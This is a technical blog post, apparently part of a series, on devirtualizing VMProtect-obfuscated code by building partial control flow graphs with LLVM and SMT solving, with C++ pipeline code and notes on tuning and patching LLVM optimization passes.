The exploration of a virtualized control flow graph can be done in different ways and usually protectors like VMProtect or Themida show a distinctive shape that can be pattern-matched with ease, simplified and parsed to obtain the outgoing edges of a conditional block.
The logic used by different VMProtect conditional jump versions has been detailed in the past, so in this section we are going to delve into an SMT-driven algorithm based on the incremental construction of the explored control flow graph and specifically built on top of the slicing logic explained in the previous section.
Given the generic nature of the detailed algorithm, nothing stops it from being used on other protectors. The usual catch is obviously caused by protections embedding hard to solve constraints that may hinder the automated solving phase, but the construction and propagation of the partial CFG constraints and expressions could still be useful in practice to pull out less automated exploration algorithms, or to identify and simplify anti-dynamic symbolic execution tricks (e.g. dummy loops leading to path explosion that could be simplified by LLVM’s loop optimization passes or custom user passes).
Partial CFG
A partial control flow graph is a control flow graph built by connecting the currently explored basic blocks through the known edges between them. The idea behind building it is that each time we explore a new basic block, we gather new outgoing edges that could lead to unexplored basic blocks, or even to known ones. Every new edge between two blocks therefore adds information to the entire control flow graph, and we can propagate new useful constraints and values to enable stronger optimizations, possibly easing the solving of the conditional branches or even changing a known branch from unconditional to conditional.
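As a minimal illustration (our own sketch, not code from the post), a partial CFG can be kept as a successor map, where adding a previously unknown edge may flip a block from "known unconditional" to conditional:

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <set>

// Partial CFG kept as an address -> successors map. Adding a previously
// unknown edge may reveal a second successor for a block, which is exactly
// the kind of information we want to propagate to later slicing queries.
using Address = uint64_t;

struct PartialCFG {
  std::map<Address, std::set<Address>> Successors;

  // Returns true if the edge was not known before
  bool addEdge(Address From, Address To) {
    return Successors[From].insert(To).second;
  }

  // A block with more than one known successor ends with a conditional branch
  bool isKnownConditional(Address Block) const {
    auto It = Successors.find(Block);
    return It != Successors.end() && It->second.size() > 1;
  }
};
```

Rebuilding the partial CFG after each newly discovered edge is what lets subsequent slicing and solving rounds see the new predecessors and their constraints.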
Let’s look at two motivating examples of why building a partial CFG may be a good idea to be able to replicate the kind of reasoning usually implemented by symbolic execution tools, with the addition of useful built-in LLVM passes.
Motivating example #1
Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlock and purple the VmBlock of interest for the example.
Let’s assume we just solved the outgoing edges for the basic block A, obtaining two connections leading to the new basic blocks B and C. Now assume that we sliced the branch condition of the sole basic block B, obtaining an access into a constant array with a 64-bit symbolic index. Enumerating all the valid indices may be a non-trivial task, so we may want to restrict the search using known constraints on the symbolic index that, if present, are most likely going to come from the chain(s) of predecessor(s) of the basic block B.
To draw a symbolic execution parallel, this is the case where we want to collect the path constraints from a certain number of predecessors (e.g. we may want to incrementally harvest the constraints, because sometimes the needed constraint lies close to the basic block we are solving) and chain them to be fed to an SMT solver to execute a successful enumeration of the valid indices.
Tools like Souper automatically harvest the set of path constraints while slicing an expression, so building the partial control flow graph and feeding it to Souper may be sufficient for the task. Additionally, with the LLVM API to walk the predecessors of a basic block it’s also quite easy to obtain the set of needed constraints and, when available, we may also take advantage of known-to-be-true conditions provided by the llvm.assume intrinsic.
Motivating example #2
Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlocks, purple the VmBlock of interest for the example, dashed red arrows the edges of interest for the example and the solid green arrow an edge that has just been processed.
Let’s assume we just solved the outgoing edges for the basic block E, obtaining two connections leading to a new block G and a known block B. In this case we know that we detected a jump to the previously visited block B (edge in green), which is basically forming a loop chain (B → C → E → B) and we know that starting from B we can reach two edges (B → C and D → F, marked in dashed red) that are currently known as unconditional, but that, given the newly obtained edge E → B, may not be anymore and therefore will need to be proved again. Building a new partial control flow graph including all the newly discovered basic block connections and slicing the branch of the blocks B and D may now show them as conditional.
As a real world case, when dealing with concolic execution approaches, the one mentioned above is the usual pattern that arises with index-based loops, starting with a known concrete index and running till the index reaches an upper or lower bound N. During the first N-1 executions the tool would take the same path and only at the iteration N the other path would be explored. That’s the reason why concolic and symbolic execution tools attempt to build heuristics or use techniques like state-merging to avoid running into path explosion issues (or at best executing the loop N times).
Building the partial CFG with LLVM instead, would mark the loop back edge as unconditional the first time, but building it again, including the knowledge of the newly discovered back edge, would immediately reveal the loop pattern. The outcome is that LLVM would now be able to apply its loop analysis passes, the user would be able to use the API to build ad-hoc LoopPass passes to handle special obfuscation applied to the loop components (e.g. encoded loop variant/invariant) or the SMT solvers would be able to treat newly created Phi nodes at the merge points as symbolic variables.
The following LLVM-IR snippet shows the sliced partial control flow graphs obtained during the exploration of the virtualized assembly snippet presented below.
The second partial CFG obtained during the exploration phase. The block 8 is returning the dummy 0xdeaddead (233496237) value, meaning that the VmBlock instructions haven’t been lifted yet.
The loop-optimized final CFG obtained at the completion of the exploration phase.
The FirstSlice function shows that a single unconditional branch has been detected, identifying the bytecode address 0x1400B85C1 (5369464257), this is because there’s no knowledge of the back edge and the comparison would be cmp 1, 2000. The SecondSlice function instead shows that a conditional branch has been detected selecting between the bytecode addresses 0x140073BE7 (5369183207) and 0x1400B85C1 (5369464257). The comparison is now done with a symbolic PHINode. The F_0x14000101f_WithLoopOpt and F_0x14000101f_NoLoopOpt functions show the fully devirtualized code with and without loop optimizations applied.
Pseudocode
Given the knowledge obtained from the motivating examples, the pseudocode for the automated partial CFG driven exploration is the following:
We initialize the algorithm creating:
A stack of addresses of VmBlocks to explore, referred to as Worklist;
A set of addresses of explored VmBlocks, referred to as Explored;
A set of addresses of VmBlocks to reprove, referred to as Reprove;
A map of known edges between the VmBlocks, referred to as Edges.
We push the address of the entry VmBlock into the Worklist;
We fetch the address of a VmBlock to explore, lift it to LLVM-IR if met for the first time, build the partial CFG using the knowledge from the Edges map, and slice the branch condition of the current VmBlock. Finally, we feed the branch condition to Souper, which processes the expression, harvesting the needed constraints and converting it to an SMT query. We can then send the query to an SMT solver, asking for the valid solutions and incrementally rejecting the known ones, up to some limit (worst case) or until all the solutions have been found.
Once we obtained the outgoing edges for the current VmBlock, we can proceed with updating the maps and sets:
We verify if each solved edge leads to a known VmBlock; if it does, we verify if this connection was previously known. If unknown, it means we found a new predecessor for a known VmBlock, so we add the addresses of all the VmBlocks reachable from the known VmBlock to the Reprove set and remove them from the Explored set; to speed things up, we can skip each VmBlock known to be firmly unconditional;
We update the Edges map with the newly solved edges.
At this point we check if the Worklist is empty. If it isn’t, we jump back to step 3. If it is, we populate it with all the addresses in the Reprove set, clearing the set in the process and jumping back to step 3. If the Reprove set is also empty, it means we explored the whole CFG and reproved all the VmBlocks that obtained new predecessors during the exploration phase.
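The steps above can be condensed into a self-contained sketch. This is our own simplification, not the SATURN implementation: the Solver map mocks the slice → Souper → SMT pipeline of step 3, and only the rediscovered block itself is reproved rather than everything reachable from it:

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <set>
#include <vector>

using Address = uint64_t;
using EdgeMap = std::map<Address, std::set<Address>>;

// Worklist-driven exploration; Solver maps a block to its solved outgoing
// edges, standing in for the SMT-based edge solving of the real algorithm.
std::set<Address> explore(Address Entry, const EdgeMap &Solver) {
  std::vector<Address> Worklist{Entry};
  std::set<Address> Explored;
  std::set<Address> Reprove;
  EdgeMap Edges;
  do {
    while (!Worklist.empty()) {
      Address Block = Worklist.back();
      Worklist.pop_back();
      if (!Explored.insert(Block).second)
        continue; // Already explored in this round
      auto It = Solver.find(Block);
      if (It == Solver.end())
        continue; // No outgoing edges solved for this block
      for (Address Succ : It->second) {
        // Update the Edges map with the newly solved edge
        if (!Edges[Block].insert(Succ).second)
          continue; // Edge already known
        if (Explored.count(Succ)) {
          // New predecessor for a known block: schedule a reprove
          Reprove.insert(Succ);
          Explored.erase(Succ);
        } else {
          Worklist.push_back(Succ);
        }
      }
    }
    // Refill the worklist with the blocks that need to be reproved
    Worklist.assign(Reprove.begin(), Reprove.end());
    Reprove.clear();
  } while (!Worklist.empty());
  return Explored;
}
```

Termination is guaranteed because a block is only scheduled for reproving when a genuinely new edge is inserted into the Edges map, which is bounded by the finite set of solvable edges.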
As mentioned at the start of the section, there are many ways to explore a virtualized CFG, and using an SMT-driven solution may generalize most of the steps. Obviously, it brings its own set of issues (e.g. hard to solve constraints), so one could fall back to the pattern matching based solution when needed. As expected, the pattern matching based solution would also blindly explore unreachable paths at times, so a mixed solution could really offer the best CFG coverage.
The pseudocode presented in this section is a simplified version of the partial CFG based exploration algorithm used by SATURN at this point in time, streamlined from a set of reasonings that are unnecessary while exploring a CFG virtualized by VMProtect.
Pipeline
So far we have hinted at the underlying usage of LLVM’s optimization and analysis passes multiple times throughout the sections, so we can finally take a look at how they fit in, their configuration and their limitations.
Managing the pipeline
Running the whole -O3 pipeline may not always be the best idea, because we may want to use only a subset of passes instead of wasting cycles on passes that we know a priori have no effect on the lifted LLVM-IR code. Additionally, by default, LLVM provides a chain of optimizations that is executed once, is meant to optimize non-obfuscated code and is designed to be as efficient as possible.
In our case, however, we have different needs and want to be able to:
Add some custom passes to tackle context-specific problems and do so at precise points in the pipeline to obtain the best possible output, while avoiding phase ordering issues;
Iterate the optimization pipeline more than once, ideally until our custom passes can’t apply any more changes to the IR code;
Be able to pass custom flags to the pipeline to toggle some passes at will and eventually feed them with information obtained from the binary (e.g. access to the binary sections).
LLVM provides a FunctionPassManager class to craft our own pipeline, using LLVM’s passes and custom passes. The following C++ snippet shows how we can add a mix of passes that will be executed in order until there are no more changes or until a threshold is reached:
void optimizeFunction(llvm::Function *F, OptimizationGuide &G) {
  // Fetch the Module
  auto *M = F->getParent();
  // Create the function pass manager
  llvm::legacy::FunctionPassManager FPM(M);
  // Initialize the pipeline
  llvm::PassManagerBuilder PMB;
  PMB.OptLevel = 3;
  PMB.SizeLevel = 2;
  PMB.RerollLoops = false;
  PMB.SLPVectorize = false;
  PMB.LoopVectorize = false;
  PMB.Inliner = createFunctionInliningPass();
  // Add the alias analysis passes
  FPM.add(createCFLSteensAAWrapperPass());
  FPM.add(createCFLAndersAAWrapperPass());
  FPM.add(createTypeBasedAAWrapperPass());
  FPM.add(createScopedNoAliasAAWrapperPass());
  // Add some useful LLVM passes
  FPM.add(createCFGSimplificationPass());
  FPM.add(createSROAPass());
  FPM.add(createEarlyCSEPass());
  // Add a custom pass here
  if (G.RunCustomPass1)
    FPM.add(createCustomPass1(G));
  FPM.add(createInstructionCombiningPass());
  FPM.add(createCFGSimplificationPass());
  // Add a custom pass here
  if (G.RunCustomPass2)
    FPM.add(createCustomPass2(G));
  FPM.add(createGVNHoistPass());
  FPM.add(createGVNSinkPass());
  FPM.add(createDeadStoreEliminationPass());
  FPM.add(createInstructionCombiningPass());
  FPM.add(createCFGSimplificationPass());
  // Execute the pipeline
  size_t minInsCount = F->getInstructionCount();
  size_t pipExeCount = 0;
  FPM.doInitialization();
  do {
    // Reset the IR changed flag
    G.HasChanged = false;
    // Run the optimizations
    FPM.run(*F);
    // Check if the function changed
    size_t curInsCount = F->getInstructionCount();
    if (curInsCount < minInsCount) {
      minInsCount = curInsCount;
      G.HasChanged |= true;
    }
    // Increment the execution count
    pipExeCount++;
  } while (G.HasChanged && pipExeCount < 5);
  FPM.doFinalization();
}
The OptimizationGuide structure can be used to pass information to the custom passes and control the execution of the pipeline.
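The OptimizationGuide definition itself is not shown; a minimal sketch covering just the fields used by the pipeline snippet (any additional field would be a guess on our part) could look like this:

```cpp
#include <cassert>

// Minimal sketch: only these fields are implied by the pipeline snippet.
struct OptimizationGuide {
  // Toggles deciding whether the custom passes are scheduled
  bool RunCustomPass1 = false;
  bool RunCustomPass2 = false;
  // Set when the driver (or a custom pass) detects that the IR changed
  bool HasChanged = false;
};
```

In practice such a structure would also carry binary-derived information (e.g. section ranges) for the custom passes, as hinted at earlier in the section.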
Configuration
As previously stated, the LLVM default pipeline is meant to be as efficient as possible, therefore it’s configured with a tradeoff between efficiency and efficacy in mind. While devirtualizing big functions it’s not uncommon to see the effects of the stricter configurations employed by default. But an example is worth a thousand words.
In the Godbolt UI we can see on the left a snippet of LLVM-IR code that is storing i32 values at increasing indices of a global array named arr. The store at line 96, writing the value 91 at arr[1], is a bit special because it fully overwrites the store at line 6, which writes the value 1 at arr[1]. If we look at the upper right result, we see that the DSE pass was applied, but somehow it didn’t do its job of removing the dead store at line 6. If we look at the bottom right result instead, we see that the DSE pass managed to achieve its goal and successfully killed the dead store at line 6. The difference is entirely down to a conservative configuration of the DSE pass, which by default (at the time of writing) walks up to 90 MemorySSA definitions before deciding that a store is not killing another post-dominated store. Setting the MemorySSAUpwardsStepLimit to a higher value (e.g. 100 in the example) is definitely something that we want to do while deobfuscating code.
Each pass that we are going to add to the custom pipeline is going to have configurations that may be giving suboptimal deobfuscation results, so it’s a good idea to check their C++ implementation and figure out if tweaking some of the options may improve the output.
Limitations
When tweaking some configurations is not giving the expected results, we may have to dig deeper into the implementation of a pass to understand if something is hindering its job, or roll up our sleeves and develop a custom LLVM pass. Some examples on why digging into a pass implementation may lead to fruitful improvements follow.
IsGuaranteedLoopInvariant (DSE, MSSA)
While looking at some devirtualized code, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diffs: D96979, D97155. The bottom line is that the IsGuaranteedLoopInvariant function used by the DSE and MSSA passes was not using the safe assumption that a pointer computed in the entry block is, by design, guaranteed to be loop invariant, as the entry block of a Function is guaranteed to have no predecessors and not to be part of a loop.
GetPointerBaseWithConstantOffset (DSE)
While looking at some devirtualized code that was accessing memory slots of different sizes, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diff: D97676. The bottom line is that while computing the partially overlapping memory stores, the DSE was considering only memory slots with the same base address, ignoring fully overlapping stores offset from each other. The solution makes use of another patch which provides information about the offsets of the memory slots: D93529.
Shift-Select folding (InstCombine)
And obviously there is no two without three! Nah, just kidding, a patch I wanted to get accepted to simplify one of the recurring patterns in the computation of the VMProtect conditional branches has been on pause because InstCombine is an extremely complex piece of code and additions to it, especially if related to uncommon patterns, are unwelcome and seen as possibly bloating and slowing down the entire pipeline. Additional information on the pattern and the reasons that hinder its folding are available in the following differential: D84664. Nothing stops us from maintaining our own version of InstCombine as a custom pass, with ad-hoc patterns specifically selected for the obfuscation under analysis.
What’s next?
In Part 3 we’ll have a look at a list of custom passes necessary to reach a superior output quality. Then, some words will be spent on the handling of the unsupported instructions and on the recompilation process. Last but not least, the output of 6 devirtualized functions, with varying code constructs, will be shown.